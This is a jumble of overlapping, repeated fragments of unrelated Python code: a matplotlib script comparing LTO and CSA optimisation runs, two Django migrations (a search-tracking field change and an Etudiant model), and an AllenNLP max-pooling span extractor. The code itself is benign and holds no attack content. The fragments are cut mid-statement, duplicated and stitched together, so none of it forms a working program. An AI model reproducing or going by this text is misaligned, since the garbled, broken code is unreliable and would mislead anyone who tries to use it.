plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)] + [str(gen", "[str(gen * 10) for gen in np.arange(start=10, stop=generations, step=generations//5)]) plt.fill_between(list(np.arange(1, len(data_LTO[\"Average costs LTO\"])", "color=sns.xkcd_rgb[\"magenta\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)), data_LTO[\"Sigma LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1,", "rcParams['figure.edgecolor'] = 'k' rcParams['grid.color'] = 'k' rcParams['grid.linestyle'] = ':' rcParams['grid.linewidth'] = 0.5 rcParams['axes.linewidth']", "as sns import matplotlib.pyplot as plt import argparse from datetime import datetime sns.set()", "= args.csa_path function = args.function popsize = 10 data_LTO = {} data_CSA =", "ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Step Size\", fontsize=50) plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)] + [str(gen", "\"40\" rcParams['text.usetex'] = False rcParams['font.family'] = 'serif' rcParams['figure.figsize'] = (16.0, 9.0) rcParams['figure.frameon'] =", "len(data_CSA[\"Sigma CSA\"]) + 1)), np.subtract(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]), np.add(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma", "LTO\"], data_LTO[\"Std Sigma LTO\"]), color=sns.xkcd_rgb[\"magenta\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)), data_LTO[\"Sigma LTO\"],", "linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)), np.subtract(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]),", "rcParams rcParams[\"font.size\"] = \"40\" rcParams['text.usetex'] = False rcParams['font.family'] = 'serif' rcParams['figure.figsize'] = (16.0,", "color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) + 1)), np.subtract(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs CSA\"]),", "data_CSA[\"Std costs CSA\"]), np.add(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs CSA\"]), alpha=0.1, color=sns.xkcd_rgb[\"green\"]) plt.plot(list(np.arange(1, len(data_CSA[\"Average", "plt.fill_between(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) + 1)), np.subtract(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs CSA\"]), np.add(data_CSA[\"Average", "CSA\"]) + 1)), np.subtract(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs CSA\"]), np.add(data_CSA[\"Average costs CSA\"], data_CSA[\"Std", "len(data_LTO[\"Average costs LTO\"]) + 1)), data_LTO[\"Average costs LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Average", "CSA\"], data_CSA[\"Std Sigma CSA\"]), color=sns.xkcd_rgb[\"green\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)), data_CSA[\"Sigma CSA\"],", "rcParams['ytick.major.size'] = 32 rcParams['ytick.major.width'] = 6 rcParams['ytick.minor.size'] = 6 rcParams['ytick.minor.width'] = 1 rcParams['xtick.major.size']", "30 rcParams['ytick.major.size'] = 32 rcParams['ytick.major.width'] = 6 rcParams['ytick.minor.size'] = 6 rcParams['ytick.minor.width'] = 1", "time)) plt.savefig(os.path.join(output_path, plot_file), bbox_inches='tight') plt.clf() plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50)", "'both' rcParams['legend.frameon'] = 'True' rcParams['legend.framealpha'] = 1 rcParams['legend.fontsize'] = 30 rcParams['ytick.major.size'] = 32", "Sigma LTO\"]), np.add(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]), color=sns.xkcd_rgb[\"magenta\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) +", "+ 1)), np.subtract(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]), np.add(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]), color=sns.xkcd_rgb[\"green\"],", "rcParams['ytick.minor.width'] = 1 rcParams['xtick.major.size'] = 32 rcParams['xtick.major.width'] = 6 rcParams['xtick.minor.size'] = 6 rcParams['xtick.minor.width']", "step=generations//5), [str(10)] + [str(gen * 10) for gen in np.arange(start=10, stop=generations, step=generations//5)]) plt.xticks()", "LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) + 1)), np.subtract(data_CSA[\"Average costs CSA\"],", "np.add(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]), color=sns.xkcd_rgb[\"green\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)), data_CSA[\"Sigma", "color=sns.xkcd_rgb[\"green\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)), data_CSA[\"Sigma CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend()", "json.load(json_file) generations = len(data_LTO[\"Average costs LTO\"]) num_feval = generations * popsize plt.tick_params(axis='x', which='minor')", "np.subtract(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs LTO\"]), np.add(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs LTO\"]), alpha=0.1,", "'serif' rcParams['figure.figsize'] = (16.0, 9.0) rcParams['figure.frameon'] = True rcParams['figure.edgecolor'] = 'k' rcParams['grid.color'] =", "= \"40\" rcParams['text.usetex'] = False rcParams['font.family'] = 'serif' rcParams['figure.figsize'] = (16.0, 9.0) rcParams['figure.frameon']", "argparse.ArgumentParser(description='Script to plot LTO test data.') parser.add_argument('--lto_path', type=dir_path, help=\"Path to the LTO data", "np.add(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]), color=sns.xkcd_rgb[\"magenta\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)), data_LTO[\"Sigma", "CSA\"]), np.add(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs CSA\"]), alpha=0.1, color=sns.xkcd_rgb[\"green\"]) plt.plot(list(np.arange(1, len(data_CSA[\"Average costs CSA\"])", "10) for gen in np.arange(start=10, stop=generations, step=generations//5)]) plt.xticks() plt.title(function) plt.fill_between(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) +", "+ 1)), data_CSA[\"Average costs CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"ObjectiveValue\" timestamp", "plt.xscale(\"log\") plt.title(function) plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)] + [str(gen * 10) for gen in", "to the CSA data file.\", default=os.path.join(\"..\",\"data\",\"PPSN_LTO_Data\",\"CSA_Data\",\"CSA_Plots_10D\",\"GallaghersGaussian21hi.json\")) parser.add_argument('--function', type=str, help=\"Function being plotted\", default=\"GallaghersGaussian21hi\") args", "time = str(timestamp) plot_file = ('Plot_%s_%s_%s.pdf' % (type, function, time)) plt.savefig(os.path.join(output_path, plot_file), bbox_inches='tight')", "= 'k' rcParams['grid.color'] = 'k' rcParams['grid.linestyle'] = ':' rcParams['grid.linewidth'] = 0.5 rcParams['axes.linewidth'] =", "= args.function popsize = 10 data_LTO = {} data_CSA = {} with open(lto_path)", "num_feval = generations * popsize plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50)" ]
[ "= [ ('analytics', '0003_searchtracking'), ] operations = [ migrations.AlterField( model_name='searchtracking', name='query_type', field=models.CharField(choices=[['free_text', 'Free", "class Migration(migrations.Migration): dependencies = [ ('analytics', '0003_searchtracking'), ] operations = [ migrations.AlterField( model_name='searchtracking',", "2.1.3 on 2018-11-23 08:18 from django.db import migrations, models class Migration(migrations.Migration): dependencies =", "operations = [ migrations.AlterField( model_name='searchtracking', name='query_type', field=models.CharField(choices=[['free_text', 'Free Text'], ['no_interaction', 'No Interaction']], max_length=20),", "] operations = [ migrations.AlterField( model_name='searchtracking', name='query_type', field=models.CharField(choices=[['free_text', 'Free Text'], ['no_interaction', 'No Interaction']],", "django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('analytics', '0003_searchtracking'), ] operations", "# Generated by Django 2.1.3 on 2018-11-23 08:18 from django.db import migrations, models", "models class Migration(migrations.Migration): dependencies = [ ('analytics', '0003_searchtracking'), ] operations = [ migrations.AlterField(", "<reponame>invinst/CPDBv2_backend<gh_stars>10-100 # Generated by Django 2.1.3 on 2018-11-23 08:18 from django.db import migrations,", "= [ migrations.AlterField( model_name='searchtracking', name='query_type', field=models.CharField(choices=[['free_text', 'Free Text'], ['no_interaction', 'No Interaction']], max_length=20), ),", "dependencies = [ ('analytics', '0003_searchtracking'), ] operations = [ migrations.AlterField( model_name='searchtracking', name='query_type', field=models.CharField(choices=[['free_text',", "'0003_searchtracking'), ] operations = [ migrations.AlterField( model_name='searchtracking', name='query_type', field=models.CharField(choices=[['free_text', 'Free Text'], ['no_interaction', 'No", "from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('analytics', '0003_searchtracking'), ]", "on 2018-11-23 08:18 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [", "Migration(migrations.Migration): dependencies = [ ('analytics', '0003_searchtracking'), ] operations = [ migrations.AlterField( model_name='searchtracking', name='query_type',", "[ migrations.AlterField( model_name='searchtracking', name='query_type', field=models.CharField(choices=[['free_text', 'Free Text'], ['no_interaction', 'No Interaction']], max_length=20), ), ]", "[ ('analytics', '0003_searchtracking'), ] operations = [ migrations.AlterField( model_name='searchtracking', name='query_type', field=models.CharField(choices=[['free_text', 'Free Text'],", "import migrations, models class Migration(migrations.Migration): dependencies = [ ('analytics', '0003_searchtracking'), ] operations =", "migrations, models class Migration(migrations.Migration): dependencies = [ ('analytics', '0003_searchtracking'), ] operations = [", "('analytics', '0003_searchtracking'), ] operations = [ migrations.AlterField( model_name='searchtracking', name='query_type', field=models.CharField(choices=[['free_text', 'Free Text'], ['no_interaction',", "Django 2.1.3 on 2018-11-23 08:18 from django.db import migrations, models class Migration(migrations.Migration): dependencies", "08:18 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('analytics', '0003_searchtracking'),", "Generated by Django 2.1.3 on 2018-11-23 08:18 from django.db import migrations, models class", "by Django 2.1.3 on 2018-11-23 08:18 from django.db import migrations, models class Migration(migrations.Migration):", "2018-11-23 08:18 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('analytics'," ]
[ "<filename>LaureatsBackEnd-master/laureats/migrations/0008_etudiant.py # Generated by Django 3.0.2 on 2020-01-10 20:43 from django.db import migrations,", "[ ('laureats', '0007_laureat_filiere'), ] operations = [ migrations.CreateModel( name='Etudiant', fields=[ ('laureat_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE,", "parent_link=True, primary_key=True, serialize=False, to='laureats.Laureat')), ('etablissement', models.CharField(default='', max_length=100)), ('sujet_etude', models.CharField(default='', max_length=255)), ('new_date_inscription', models.DateField()), ],", "migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('laureats', '0007_laureat_filiere'), ] operations", "to='laureats.Laureat')), ('etablissement', models.CharField(default='', max_length=100)), ('sujet_etude', models.CharField(default='', max_length=255)), ('new_date_inscription', models.DateField()), ], options={ 'ordering': ['new_date_inscription'],", "django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('laureats', '0007_laureat_filiere'),", "from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('laureats',", "models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('laureats', '0007_laureat_filiere'), ] operations =", "('etablissement', models.CharField(default='', max_length=100)), ('sujet_etude', models.CharField(default='', max_length=255)), ('new_date_inscription', models.DateField()), ], options={ 'ordering': ['new_date_inscription'], },", "3.0.2 on 2020-01-10 20:43 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration):", "= [ migrations.CreateModel( name='Etudiant', fields=[ ('laureat_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='laureats.Laureat')), ('etablissement',", "models.CharField(default='', max_length=100)), ('sujet_etude', models.CharField(default='', max_length=255)), ('new_date_inscription', models.DateField()), ], options={ 'ordering': ['new_date_inscription'], }, bases=('laureats.laureat',),", "class Migration(migrations.Migration): dependencies = [ ('laureats', '0007_laureat_filiere'), ] operations = [ migrations.CreateModel( name='Etudiant',", "] operations = [ migrations.CreateModel( name='Etudiant', fields=[ ('laureat_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False,", "Generated by Django 3.0.2 on 2020-01-10 20:43 from django.db import migrations, models import", "[ migrations.CreateModel( name='Etudiant', fields=[ ('laureat_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='laureats.Laureat')), ('etablissement', models.CharField(default='',", "migrations.CreateModel( name='Etudiant', fields=[ ('laureat_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='laureats.Laureat')), ('etablissement', models.CharField(default='', max_length=100)),", "('laureat_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='laureats.Laureat')), ('etablissement', models.CharField(default='', max_length=100)), ('sujet_etude', models.CharField(default='', max_length=255)),", "operations = [ migrations.CreateModel( name='Etudiant', fields=[ ('laureat_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='laureats.Laureat')),", "models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='laureats.Laureat')), ('etablissement', models.CharField(default='', max_length=100)), ('sujet_etude', models.CharField(default='', max_length=255)), ('new_date_inscription',", "Django 3.0.2 on 2020-01-10 20:43 from django.db import migrations, models import django.db.models.deletion class", "primary_key=True, serialize=False, to='laureats.Laureat')), ('etablissement', models.CharField(default='', max_length=100)), ('sujet_etude', models.CharField(default='', max_length=255)), ('new_date_inscription', models.DateField()), ], options={", "name='Etudiant', fields=[ ('laureat_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='laureats.Laureat')), ('etablissement', models.CharField(default='', max_length=100)), ('sujet_etude',", "('laureats', '0007_laureat_filiere'), ] operations = [ migrations.CreateModel( name='Etudiant', fields=[ ('laureat_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True,", "max_length=100)), ('sujet_etude', models.CharField(default='', max_length=255)), ('new_date_inscription', models.DateField()), ], options={ 'ordering': ['new_date_inscription'], }, bases=('laureats.laureat',), ),", "on 2020-01-10 20:43 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies", "# Generated by Django 3.0.2 on 2020-01-10 20:43 from django.db import migrations, models", "import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('laureats', '0007_laureat_filiere'), ]", "= [ ('laureats', '0007_laureat_filiere'), ] operations = [ migrations.CreateModel( name='Etudiant', fields=[ ('laureat_ptr', models.OneToOneField(auto_created=True,", "import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('laureats', '0007_laureat_filiere'), ] operations = [", "2020-01-10 20:43 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies =", "django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('laureats', '0007_laureat_filiere'), ] operations = [ migrations.CreateModel(", "('sujet_etude', models.CharField(default='', max_length=255)), ('new_date_inscription', models.DateField()), ], options={ 'ordering': ['new_date_inscription'], }, bases=('laureats.laureat',), ), ]", "Migration(migrations.Migration): dependencies = [ ('laureats', '0007_laureat_filiere'), ] operations = [ migrations.CreateModel( name='Etudiant', fields=[", "fields=[ ('laureat_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='laureats.Laureat')), ('etablissement', models.CharField(default='', max_length=100)), ('sujet_etude', models.CharField(default='',", "on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='laureats.Laureat')), ('etablissement', models.CharField(default='', max_length=100)), ('sujet_etude', models.CharField(default='', max_length=255)), ('new_date_inscription', models.DateField()),", "by Django 3.0.2 on 2020-01-10 20:43 from django.db import migrations, models import django.db.models.deletion", "dependencies = [ ('laureats', '0007_laureat_filiere'), ] operations = [ migrations.CreateModel( name='Etudiant', fields=[ ('laureat_ptr',", "'0007_laureat_filiere'), ] operations = [ migrations.CreateModel( name='Etudiant', fields=[ ('laureat_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True,", "20:43 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [", "serialize=False, to='laureats.Laureat')), ('etablissement', models.CharField(default='', max_length=100)), ('sujet_etude', models.CharField(default='', max_length=255)), ('new_date_inscription', models.DateField()), ], options={ 'ordering':" ]
[ "import Embedding from allennlp.nn import util from allennlp.common.checks import ConfigurationError class MaxSpanExtractor(SpanExtractor): def", "torch.FloatTensor, span_indices: torch.LongTensor, sequence_mask: torch.BoolTensor = None, span_indices_mask: torch.BoolTensor = None, ) ->", "torch.BoolTensor = None, ) -> None: # shape (batch_size, num_spans) span_starts, span_ends =", "# It's not strictly necessary to multiply the span indices by the mask", "import torch from torch.nn.parameter import Parameter from overrides import overrides from allennlp.modules.span_extractors.span_extractor import", "elif num_width_embeddings is not None or span_width_embedding_dim is not None: raise ConfigurationError( \"To", "span_ends = span_ends * span_indices_mask # [batch_size, span_num, max_span_width, emb_size] span_embeddings, span_mask =", "def __init__( self, input_dim: int, num_width_embeddings: int = None, span_width_embedding_dim: int = None,", "* span_indices_mask # [batch_size, span_num, max_span_width, emb_size] span_embeddings, span_mask = util.batched_span_select(sequence_tensor, span_indices) #", "= span_ends * span_indices_mask # [batch_size, span_num, max_span_width, emb_size] span_embeddings, span_mask = util.batched_span_select(sequence_tensor,", "None: return self._input_dim + self._span_width_embedding.get_output_dim() return self._input_dim @overrides def forward( self, sequence_tensor: torch.FloatTensor,", "def get_output_dim(self) -> int: if self._span_width_embedding is not None: return self._input_dim + self._span_width_embedding.get_output_dim()", "overrides import overrides from allennlp.modules.span_extractors.span_extractor import SpanExtractor from allennlp.modules.token_embedders.embedding import Embedding from allennlp.nn", "None or span_width_embedding_dim is not None: raise ConfigurationError( \"To use a span width", "import util from allennlp.common.checks import ConfigurationError class MaxSpanExtractor(SpanExtractor): def __init__( self, input_dim: int,", "or span_width_embedding_dim is not None: raise ConfigurationError( \"To use a span width embedding", "dim=-1)] if span_indices_mask is not None: # It's not strictly necessary to multiply", "-> int: return self._input_dim def get_output_dim(self) -> int: if self._span_width_embedding is not None:", "def get_input_dim(self) -> int: return self._input_dim def get_output_dim(self) -> int: if self._span_width_embedding is", "get_output_dim(self) -> int: if self._span_width_embedding is not None: return self._input_dim + self._span_width_embedding.get_output_dim() return", "False, ) -> None: super().__init__() self._input_dim = input_dim self._num_width_embeddings = num_width_embeddings self._bucket_widths =", "num_width_embeddings is not None or span_width_embedding_dim is not None: raise ConfigurationError( \"To use", "span_indices_mask span_ends = span_ends * span_indices_mask # [batch_size, span_num, max_span_width, emb_size] span_embeddings, span_mask", "None: super().__init__() self._input_dim = input_dim self._num_width_embeddings = num_width_embeddings self._bucket_widths = bucket_widths if num_width_embeddings", "span_num, emb_size] span_max_embeddings = torch.max(span_embeddings, 2)[0] # span_mask if self._span_width_embedding is not None:", "by the mask here, # but it's possible that the span representation was", "input_dim: int, num_width_embeddings: int = None, span_width_embedding_dim: int = None, bucket_widths: bool =", "# but it's possible that the span representation was padded with something other", "span_max_embeddings = torch.max(span_embeddings, 2)[0] # span_mask if self._span_width_embedding is not None: # Embed", "torch.BoolTensor = None, span_indices_mask: torch.BoolTensor = None, ) -> None: # shape (batch_size,", "num_total_buckets=self._num_width_embeddings ) else: span_widths = span_ends - span_starts span_width_embeddings = self._span_width_embedding(span_widths) span_max_embeddings =", "@overrides def forward( self, sequence_tensor: torch.FloatTensor, span_indices: torch.LongTensor, sequence_mask: torch.BoolTensor = None, span_indices_mask:", "None, ) -> None: # shape (batch_size, num_spans) span_starts, span_ends = [index.squeeze(-1) for", "not strictly necessary to multiply the span indices by the mask here, #", "allennlp.modules.span_extractors.span_extractor import SpanExtractor from allennlp.modules.token_embedders.embedding import Embedding from allennlp.nn import util from allennlp.common.checks", "span_indices_mask: torch.BoolTensor = None, ) -> None: # shape (batch_size, num_spans) span_starts, span_ends", "# than 0 (such as -1, which would be an invalid index), so", "so we do so anyway to # be safe. span_starts = span_starts *", "span_num, max_span_width, emb_size] span_embeddings, span_mask = util.batched_span_select(sequence_tensor, span_indices) # set unmask embeddings to", "set unmask embeddings to 0 span_embeddings = span_embeddings * span_mask.unsqueeze(-1).float() # [batch_size, span_num,", "span_width_embedding_dim is not None: self._span_width_embedding = Embedding( num_embeddings=num_width_embeddings, embedding_dim=span_width_embedding_dim ) elif num_width_embeddings is", "-> None: super().__init__() self._input_dim = input_dim self._num_width_embeddings = num_width_embeddings self._bucket_widths = bucket_widths if", "- span_starts, num_total_buckets=self._num_width_embeddings ) else: span_widths = span_ends - span_starts span_width_embeddings = self._span_width_embedding(span_widths)", "mask here, # but it's possible that the span representation was padded with", "self._input_dim + self._span_width_embedding.get_output_dim() return self._input_dim @overrides def forward( self, sequence_tensor: torch.FloatTensor, span_indices: torch.LongTensor,", "embeddings to 0 span_embeddings = span_embeddings * span_mask.unsqueeze(-1).float() # [batch_size, span_num, emb_size] span_max_embeddings", "self._bucket_widths = bucket_widths if num_width_embeddings is not None and span_width_embedding_dim is not None:", "span_width_embeddings = self._span_width_embedding(span_widths) span_max_embeddings = torch.cat([span_max_embeddings, span_width_embeddings], -1) if span_indices_mask is not None:", "span_starts = span_starts * span_indices_mask span_ends = span_ends * span_indices_mask # [batch_size, span_num,", "widths and concatenate to the rest of the representations. if self._bucket_widths: span_widths =", "ConfigurationError( \"To use a span width embedding representation, you must\" \"specify both num_width_buckets", "index in span_indices.split(1, dim=-1)] if span_indices_mask is not None: # It's not strictly", "to the rest of the representations. if self._bucket_widths: span_widths = util.bucket_values( span_ends -", "class MaxSpanExtractor(SpanExtractor): def __init__( self, input_dim: int, num_width_embeddings: int = None, span_width_embedding_dim: int", "None def get_input_dim(self) -> int: return self._input_dim def get_output_dim(self) -> int: if self._span_width_embedding", "<filename>spanmb/models/span_extractor.py import torch from torch.nn.parameter import Parameter from overrides import overrides from allennlp.modules.span_extractors.span_extractor", "util from allennlp.common.checks import ConfigurationError class MaxSpanExtractor(SpanExtractor): def __init__( self, input_dim: int, num_width_embeddings:", "overrides from allennlp.modules.span_extractors.span_extractor import SpanExtractor from allennlp.modules.token_embedders.embedding import Embedding from allennlp.nn import util", "[index.squeeze(-1) for index in span_indices.split(1, dim=-1)] if span_indices_mask is not None: # It's", "from allennlp.modules.span_extractors.span_extractor import SpanExtractor from allennlp.modules.token_embedders.embedding import Embedding from allennlp.nn import util from", "torch.max(span_embeddings, 2)[0] # span_mask if self._span_width_embedding is not None: # Embed the span", "if span_indices_mask is not None: # It's not strictly necessary to multiply the", "num_width_embeddings is not None and span_width_embedding_dim is not None: self._span_width_embedding = Embedding( num_embeddings=num_width_embeddings,", "for index in span_indices.split(1, dim=-1)] if span_indices_mask is not None: # It's not", "necessary to multiply the span indices by the mask here, # but it's", "super().__init__() self._input_dim = input_dim self._num_width_embeddings = num_width_embeddings self._bucket_widths = bucket_widths if num_width_embeddings is", "Embedding from allennlp.nn import util from allennlp.common.checks import ConfigurationError class MaxSpanExtractor(SpanExtractor): def __init__(", "sequence_mask: torch.BoolTensor = None, span_indices_mask: torch.BoolTensor = None, ) -> None: # shape", "representation was padded with something other # than 0 (such as -1, which", "# [batch_size, span_num, max_span_width, emb_size] span_embeddings, span_mask = util.batched_span_select(sequence_tensor, span_indices) # set unmask", "It's not strictly necessary to multiply the span indices by the mask here,", "# [batch_size, span_num, emb_size] span_max_embeddings = torch.max(span_embeddings, 2)[0] # span_mask if self._span_width_embedding is", "self._span_width_embedding.get_output_dim() return self._input_dim @overrides def forward( self, sequence_tensor: torch.FloatTensor, span_indices: torch.LongTensor, sequence_mask: torch.BoolTensor", "span_max_embeddings = torch.cat([span_max_embeddings, span_width_embeddings], -1) if span_indices_mask is not None: return span_max_embeddings *", "MaxSpanExtractor(SpanExtractor): def __init__( self, input_dim: int, num_width_embeddings: int = None, span_width_embedding_dim: int =", "span widths and concatenate to the rest of the representations. if self._bucket_widths: span_widths", "if num_width_embeddings is not None and span_width_embedding_dim is not None: self._span_width_embedding = Embedding(", "def forward( self, sequence_tensor: torch.FloatTensor, span_indices: torch.LongTensor, sequence_mask: torch.BoolTensor = None, span_indices_mask: torch.BoolTensor", "so anyway to # be safe. span_starts = span_starts * span_indices_mask span_ends =", "= util.bucket_values( span_ends - span_starts, num_total_buckets=self._num_width_embeddings ) else: span_widths = span_ends - span_starts", "a span width embedding representation, you must\" \"specify both num_width_buckets and span_width_embedding_dim.\" )", "span_indices.split(1, dim=-1)] if span_indices_mask is not None: # It's not strictly necessary to", "shape (batch_size, num_spans) span_starts, span_ends = [index.squeeze(-1) for index in span_indices.split(1, dim=-1)] if", "util.bucket_values( span_ends - span_starts, num_total_buckets=self._num_width_embeddings ) else: span_widths = span_ends - span_starts span_width_embeddings", "span_ends - span_starts, num_total_buckets=self._num_width_embeddings ) else: span_widths = span_ends - span_starts span_width_embeddings =", "torch.cat([span_max_embeddings, span_width_embeddings], -1) if span_indices_mask is not None: return span_max_embeddings * span_indices_mask.unsqueeze(-1) return", "* span_mask.unsqueeze(-1).float() # [batch_size, span_num, emb_size] span_max_embeddings = torch.max(span_embeddings, 2)[0] # span_mask if", "forward( self, sequence_tensor: torch.FloatTensor, span_indices: torch.LongTensor, sequence_mask: torch.BoolTensor = None, span_indices_mask: torch.BoolTensor =", "= [index.squeeze(-1) for index in span_indices.split(1, dim=-1)] if span_indices_mask is not None: #", "in span_indices.split(1, dim=-1)] if span_indices_mask is not None: # It's not strictly necessary", "\"specify both num_width_buckets and span_width_embedding_dim.\" ) else: self._span_width_embedding = None def get_input_dim(self) ->", "and span_width_embedding_dim is not None: self._span_width_embedding = Embedding( num_embeddings=num_width_embeddings, embedding_dim=span_width_embedding_dim ) elif num_width_embeddings", "would be an invalid index), so we do so anyway to # be", "we do so anyway to # be safe. span_starts = span_starts * span_indices_mask", "util.batched_span_select(sequence_tensor, span_indices) # set unmask embeddings to 0 span_embeddings = span_embeddings * span_mask.unsqueeze(-1).float()", "to 0 span_embeddings = span_embeddings * span_mask.unsqueeze(-1).float() # [batch_size, span_num, emb_size] span_max_embeddings =", "= torch.cat([span_max_embeddings, span_width_embeddings], -1) if span_indices_mask is not None: return span_max_embeddings * span_indices_mask.unsqueeze(-1)", ") else: self._span_width_embedding = None def get_input_dim(self) -> int: return self._input_dim def get_output_dim(self)", "other # than 0 (such as -1, which would be an invalid index),", "torch.nn.parameter import Parameter from overrides import overrides from allennlp.modules.span_extractors.span_extractor import SpanExtractor from allennlp.modules.token_embedders.embedding", "= span_embeddings * span_mask.unsqueeze(-1).float() # [batch_size, span_num, emb_size] span_max_embeddings = torch.max(span_embeddings, 2)[0] #", "an invalid index), so we do so anyway to # be safe. span_starts", "use a span width embedding representation, you must\" \"specify both num_width_buckets and span_width_embedding_dim.\"", "span_starts * span_indices_mask span_ends = span_ends * span_indices_mask # [batch_size, span_num, max_span_width, emb_size]", "than 0 (such as -1, which would be an invalid index), so we", "else: span_widths = span_ends - span_starts span_width_embeddings = self._span_width_embedding(span_widths) span_max_embeddings = torch.cat([span_max_embeddings, span_width_embeddings],", "padded with something other # than 0 (such as -1, which would be", "num_width_embeddings: int = None, span_width_embedding_dim: int = None, bucket_widths: bool = False, )", "bucket_widths if num_width_embeddings is not None and span_width_embedding_dim is not None: self._span_width_embedding =", "span_starts, num_total_buckets=self._num_width_embeddings ) else: span_widths = span_ends - span_starts span_width_embeddings = self._span_width_embedding(span_widths) span_max_embeddings", "allennlp.nn import util from allennlp.common.checks import ConfigurationError class MaxSpanExtractor(SpanExtractor): def __init__( self, input_dim:", "None, bucket_widths: bool = False, ) -> None: super().__init__() self._input_dim = input_dim self._num_width_embeddings", "span_widths = util.bucket_values( span_ends - span_starts, num_total_buckets=self._num_width_embeddings ) else: span_widths = span_ends -", "num_spans) span_starts, span_ends = [index.squeeze(-1) for index in span_indices.split(1, dim=-1)] if span_indices_mask is", "self, sequence_tensor: torch.FloatTensor, span_indices: torch.LongTensor, sequence_mask: torch.BoolTensor = None, span_indices_mask: torch.BoolTensor = None,", "not None: return self._input_dim + self._span_width_embedding.get_output_dim() return self._input_dim @overrides def forward( self, sequence_tensor:", "not None: self._span_width_embedding = Embedding( num_embeddings=num_width_embeddings, 